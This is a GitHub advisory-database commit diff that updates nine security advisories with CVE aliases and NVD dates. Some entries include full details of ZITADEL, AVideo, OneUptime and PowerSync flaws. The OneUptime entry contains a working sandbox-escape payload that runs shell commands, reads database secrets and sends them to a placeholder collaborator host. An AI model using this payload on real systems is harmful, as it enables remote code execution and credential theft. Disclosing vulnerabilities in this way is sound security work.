Publish Advisories

GHSA-pfrf-9r5f-73f5
GHSA-25rw-g6ff-fmg8
GHSA-6rx5-m2rc-hmf7
GHSA-6w2r-cfpc-23r5
GHSA-8qp7-fhr9-fw53
GHSA-928r-fm4v-mvrw
GHSA-95v5-prp4-5gv5
GHSA-h343-gg57-2q67
GHSA-q6wc-xx4m-92fj

Author: advisory-database[bot]

advisories/github-reviewed/2025/12/GHSA-pfrf-9r5f-73f5/GHSA-pfrf-9r5f-73f5.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-pfrf-9r5f-73f5",
-  "modified": "2025-12-08T22:19:38Z",
+  "modified": "2026-03-09T15:47:05Z",
   "published": "2025-12-08T22:19:38Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-29067"
+  ],
   "summary": "ZITADEL Vulnerable to Account Takeover Due to Improper Instance Validation in V2 Login",
   "details": "### Summary\n\nA potential vulnerability exists in ZITADEL's password reset mechanism in login V2. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user.\n\n### Impact\n\nIf an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user's password and gain unauthorized access to their account.\n\nIt's important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled.\n\n### Affected Versions\n\nSystems using the login UI (v2) and running one of the following versions are affected:\n- **v4.x**: `4.0.0-rc.1` through `4.7.0`\n\n### Patches\n\nThe vulnerability has been addressed in the latest release. The patch resolves the issue by correctly validating the X-Forwarded-Host and Forwarded headers against the instance custom and trusted domains.\n\nBefore you upgrade, ensure that:\n- the `ZITADEL_API_URL` is set and is pointing to your instance, resp. system in multi-instance deployments.\n- the HTTP `host` (or a `x-forwarded-host`) is passed in your reverse proxy to the login UI.\n- a `x-zitadel-instance-host` (or `x-zitadel-forward-host`) is set in your reverse for multi-instance deployments. If you're running a single instance solution, you don't need to take any actions.\n\nPatched versions:\n- 4.x: Upgrade to >=[4.7.1](https://github.com/zitadel/zitadel/releases/tag/v4.7.1)\n\n### Workarounds\n\nThe recommended solution is to update ZITADEL to a patched version.\n\nA ZITADEL fronting proxy can be configured to delete all forwarded header values or set it to the requested host before sending requests to ZITADEL self-hosted environments.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThanks to Amit Laish – GE Vernova for finding and reporting the vulnerability.",
   "severity": [
@@ -95,6 +97,10 @@
       "type": "WEB",
       "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-pfrf-9r5f-73f5"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29067"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96"
@@ -111,6 +117,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2025-12-08T22:19:38Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-07T15:15:54Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-25rw-g6ff-fmg8/GHSA-25rw-g6ff-fmg8.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-25rw-g6ff-fmg8",
-  "modified": "2026-03-04T22:51:16Z",
+  "modified": "2026-03-09T15:46:19Z",
   "published": "2026-03-04T22:51:16Z",
   "aliases": [
     "CVE-2026-29193"
@@ -65,6 +65,10 @@
       "type": "WEB",
       "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-25rw-g6ff-fmg8"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29193"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/zitadel/zitadel"
@@ -81,6 +85,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-04T22:51:16Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-07T15:15:55Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-6rx5-m2rc-hmf7/GHSA-6rx5-m2rc-hmf7.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-6rx5-m2rc-hmf7",
-  "modified": "2026-03-04T22:53:42Z",
+  "modified": "2026-03-09T15:46:34Z",
   "published": "2026-03-04T22:53:42Z",
   "aliases": [
     "CVE-2026-29192"
@@ -59,6 +59,10 @@
       "type": "WEB",
       "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-6rx5-m2rc-hmf7"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29192"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/zitadel/zitadel"
@@ -75,6 +79,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-04T22:53:42Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-07T15:15:55Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-6w2r-cfpc-23r5/GHSA-6w2r-cfpc-23r5.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-6w2r-cfpc-23r5",
-  "modified": "2026-03-07T02:25:48Z",
+  "modified": "2026-03-09T15:47:26Z",
   "published": "2026-03-07T02:25:48Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-30885"
+  ],
   "summary": "AVideo has Unauthenticated IDOR - Playlist Information Disclosure",
   "details": "**Product:** AVideo (https://github.com/WWBN/AVideo)\n**Version:** Latest (tested March 2026)\n**Type:** Insecure Direct Object Reference (IDOR)\n**Auth Required:** No\n**User Interaction:** None\n\n## Summary\n\nThe `/objects/playlistsFromUser.json.php` endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform.\n\n## Root Cause\n\nThe endpoint accepts a `users_id` parameter and directly queries the database without any authentication or authorization check.\n**File:** `objects/playlistsFromUser.json.php`\n\n```php\nif (empty($_GET['users_id'])) {\n    die(\"You need a user\");\n}\n// NO AUTHENTICATION CHECK\n// NO AUTHORIZATION CHECK (does this user_id belong to the requester?)\n$row = PlayList::getAllFromUser($_GET['users_id'], false);\necho json_encode($row);\n```\n\nThere is no call to `User::isLogged()` or any comparison between the requesting user and the target `users_id`.\n\n## Affected Code\n\n| File | Line | Issue |\n|------|------|-------|\n| `objects/playlistsFromUser.json.php` | 10-21 | No authentication or authorization check before returning playlist data |\n\n## Proof of Concept\n\n### Retrieve admin's playlists (user ID 1)\n\n```bash\ncurl \"https://TARGET/objects/playlistsFromUser.json.php?users_id=1\"\n```\n\n**Response:**\n```json\n[\n  {\"id\":false,\"name\":\"Watch Later\",\"status\":\"watch_later\",\"users_id\":1},\n  {\"id\":false,\"name\":\"Favorite\",\"status\":\"favorite\",\"users_id\":1}\n]\n```\n\n<img width=\"1805\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a13c9c2f-29be-4399-98d2-7570ca30465a\" />\n\n\n## Impact\n\n- **Privacy violation** — any visitor can see all users' playlist names and contents\n- **User enumeration** — valid user IDs can be discovered by iterating through IDs\n- **Information gathering** — playlist names and video IDs reveal user interests and private content preferences\n- **Targeted attacks** — gathered information can be used for social engineering or further exploitation\n\n## Remediation\n\nAdd authentication and authorization checks:\n\n```php\n// Option 1: Require authentication + only own playlists\nif (!User::isLogged()) {\n    die(json_encode(['error' => 'Authentication required']));\n}\nif ($_GET['users_id'] != User::getId() && !User::isAdmin()) {\n    die(json_encode(['error' => 'Access denied']));\n}\n\n// Option 2: If public playlists are intended, filter by visibility\n$row = PlayList::getAllFromUser($_GET['users_id'], false, 'public');\n```",
   "severity": [

advisories/github-reviewed/2026/03/GHSA-8qp7-fhr9-fw53/GHSA-8qp7-fhr9-fw53.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8qp7-fhr9-fw53",
-  "modified": "2026-03-05T00:23:51Z",
+  "modified": "2026-03-09T15:46:58Z",
   "published": "2026-03-05T00:23:51Z",
   "aliases": [
     "CVE-2026-29184"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/backstage/backstage/security/advisories/GHSA-8qp7-fhr9-fw53"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29184"
+    },
     {
       "type": "WEB",
       "url": "https://backstage.io/docs/overview/threat-model"
@@ -63,6 +67,6 @@
     "severity": "LOW",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-05T00:23:51Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-07T15:15:55Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-928r-fm4v-mvrw/GHSA-928r-fm4v-mvrw.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-928r-fm4v-mvrw",
-  "modified": "2026-03-05T00:12:07Z",
+  "modified": "2026-03-09T15:46:44Z",
   "published": "2026-03-05T00:12:07Z",
   "aliases": [
     "CVE-2026-29186"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/backstage/backstage/security/advisories/GHSA-928r-fm4v-mvrw"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29186"
+    },
     {
       "type": "WEB",
       "url": "https://backstage.io/docs/features/techdocs/architecture"
@@ -68,6 +72,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-05T00:12:07Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-07T15:15:55Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-95v5-prp4-5gv5/GHSA-95v5-prp4-5gv5.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-95v5-prp4-5gv5",
-  "modified": "2026-03-05T00:20:45Z",
+  "modified": "2026-03-09T15:46:52Z",
   "published": "2026-03-05T00:20:45Z",
   "aliases": [
     "CVE-2026-29185"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/backstage/backstage/security/advisories/GHSA-95v5-prp4-5gv5"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29185"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/backstage/backstage"
@@ -55,6 +59,6 @@
     "severity": "LOW",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-05T00:20:45Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-07T15:15:55Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-h343-gg57-2q67/GHSA-h343-gg57-2q67.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-h343-gg57-2q67",
-  "modified": "2026-03-07T02:30:09Z",
+  "modified": "2026-03-09T15:47:34Z",
   "published": "2026-03-07T02:30:09Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-30887"
+  ],
   "summary": "OneUpTime's Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE",
   "details": "### Summary\nOneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js `vm` module. By leveraging a standard prototype-chain escape (`this.constructor.constructor`), an attacker can bypass the sandbox, gain access to the underlying Node.js `process` object, and execute arbitrary system commands (RCE) on the `oneuptime-probe` container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.\n\n### Details\nThe root cause of the vulnerability exists in [Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts) where user-supplied JavaScript is executed using `vm.runInContext()`:\n\n```typescript\nconst vmPromise = vm.runInContext(script, sandbox, { ... });\n```\n\nThe Node.js documentation explicitly warns that the `vm` module is not a security boundary and should never be used to run untrusted code. \n\nWhen a user creates a **Synthetic Monitor**, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., `isolated-vm` or a dedicated restricted container). \n\nAn attacker can use the payload `const proc = this.constructor.constructor('return process')();` to step out of the sandbox context and grab the host's native `process` object. From there, they can require `child_process` to execute arbitrary shell commands. \n\nSince the `oneuptime-probe` service runs with access to sensitive environment variables (such as `ONEUPTIME_SECRET`, `DATABASE_PASSWORD`, etc.), an attacker can trivially exfiltrate these secrets to an external server.\n\n### PoC\nThis exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least \"Project Member\" permissions.\n\n1. **Log In**: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).\n2. **Navigate**: Go to **Monitors** > **Create New Monitor**.\n3. **Monitor Type**: Select **Synthetic Monitor**.\n4. **Browser/Screen Settings**: Ensure **Chromium** is selected for \"Browser Types\" and **Desktop** is selected for \"Screen Size Types\".\n5. **Payload Injection**: Scroll down to the \"Playwright Code\" editor. Delete the default template and paste the following malicious JavaScript payload:\n\n```javascript\nreturn new Promise((resolve) => {\n    try {\n        // 1. Traverse the prototype chain to grab the host's process object\n        const proc = this.constructor.constructor('return process')();\n        \n        // 2. Load the host's child_process module & run a system command\n        const cp = proc.mainModule.require('child_process');\n        const output = cp.execSync('ls -la /usr/src/app').toString();\n        \n        // 3. (Optional) Read sensitive environment secrets\n        const secret = proc.env.ONEUPTIME_SECRET;\n        const db_pass = proc.env.DATABASE_PASSWORD;\n        \n        // 4. Exfiltrate the data via the native `http` module\n        const http_real = proc.mainModule.require('http');\n        const req = http_real.request({ \n            hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE', \n            port: 80, \n            path: '/', \n            method: 'POST' \n        }, (res) => {\n            resolve(\"EXFILTRATION_STATUS: \" + res.statusCode);\n        });\n        \n        req.on('error', (e) => resolve(\"EXFILTRATION_ERROR: \" + e.message));\n        \n        const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });\n        req.write(payloadData);\n        req.end();\n    } catch(e) {\n        resolve(\"CRITICAL_ERROR: \" + e.message);\n    }\n});\n```\n\n6. **Save & Execute**: Click **Save**. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.\n\nOUTPUT:\n```\n{\"rce_output\":\"total 296\\ndrwxr-xr-x   1 root root   4096 Mar  3 18:27 .\\ndrwxr-xr-x   1 root root   4096 Mar  3 18:26 ..\\n-rw-r--r--   1 root root     16 Mar  3 18:24 .gitattributes\\n-rwxr-xr-x   1 root root    403 Mar  3 18:24 .gitignore\\ndrwxr-xr-x   2 root root   4096 Mar  3 18:24 API\\n-rw-r--r--   1 root root   4103 Mar  3 18:24 Config.ts\\n-rw-r--r--   1 root root   2602 Mar  3 18:24 Dockerfile\\n-rw-r--r--   1 root root   2705 Mar  3 18:24 Dockerfile.tpl\\n-rw-r--r--   1 root root   2935 Mar  3 18:24 Index.ts\\ndrwxr-xr-x   3 root root   4096 Mar  3 18:24 Jobs\\ndrwxr-xr-x   2 root root   4096 Mar  3 18:24 Services\\ndrwxr-xr-x   4 root root   4096 Mar  3 18:24 Tests\\ndrwxr-xr-x   3 root root   4096 Mar  3 18:24 Utils\\ndrwxr-xr-x   3 root root   4096 Mar  3 18:27 build\\n-rw-r--r--   1 root root    889 Mar  3 18:24 jest.config.json\\ndrwxr-xr-x 297 root root  12288 Mar  3 18:26 node_modules\\n-rw-r--r--   1 root root    353 Mar  3 18:24 nodemon.json\\n-rw-r--r--   1 root root 203119 Mar  3 18:24 package-lock.json\\n-rw-r--r--   1 root root   1481 Mar  3 18:24 package.json\\n-rw-r--r--   1 root root  11514 Mar  3 18:24 tsconfig.json\\n\"}\n\n```\n<img width=\"1364\" height=\"470\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba\" />\n\n\n### Impact\n**What kind of vulnerability is it?** \nRemote Code Execution (RCE) / Code Injection / Sandbox Escape.\n\n**Who is impacted?** \nAny OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.\n\n---",
   "severity": [

advisories/github-reviewed/2026/03/GHSA-q6wc-xx4m-92fj/GHSA-q6wc-xx4m-92fj.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-q6wc-xx4m-92fj",
-  "modified": "2026-03-07T02:23:25Z",
+  "modified": "2026-03-09T15:47:13Z",
   "published": "2026-03-07T02:23:24Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-30870"
+  ],
   "summary": "PowerSync: Some sync filters ignored on 1.20.0 using `config.edition: 3`",
   "details": "### Impact\n\nIn version **1.20.0**, when using new sync streams with `config.edition: 3`, certain subquery filters were ignored when determining which data to sync to users.\n\nDepending on the sync stream configuration, this could result in authenticated users syncing data that should have been restricted.\n\nOnly queries that gate synchronization using subqueries without partitioning the result set are affected.\n\nNot affected:\n * Sync rules (bucket_definitions)\n * Sync streams using `config.edition: 2`\n * No data is exposed without authenticating\n\n### Patches\n\nThe issue is **fixed in 1.20.1**. Restarting the service with the new version is sufficient - no reprocessing of sync streams is required.\n\nAny data that users erroneously synced will be automatically removed from those devices when they connect again.\n\nPowerSync has updated all affected PowerSync Cloud instances to the fixed version, and is reaching out to affected customers.\n\nFor self-hosted PowerSync instances, update to the latest version and restart.\n\n### Affected queries\n\nSubqueries used only to determine whether or not a table should be synced (without partitioning the data itself) are affected. Examples:\n\n```sql\n-- Goal: Sync a table only to admin users\n-- 1.20.0: all authenticated users would sync this table\nSELECT * FROM sensitive_table WHERE auth.user_id() IN (SELECT user_id FROM admins)\nSELECT * FROM sensitive_table WHERE 1 IN (SELECT 1 FROM users WHERE id = auth.user_id() AND is_admin = TRUE)\n\n-- Goal: Sync a table only if authorized\n-- 1.20.0: all authenticated users would sync this table\nSELECT * FROM sensitive_table WHERE 'sensitive_table' IN (SELECT table_name FROM synced_table WHERE \"user\" = auth.user_id())\nSELECT * FROM sensitive_table WHERE 'sensitive_table' IN auth.parameter('allowed_tables')\n```\n\nQueries that partition data (for example `SELECT * FROM sensitive_table WHERE owner IN (SELECT id FROM users WHERE is_admin AND id = auth.user_id())`) are not affected by this issue.",
   "severity": [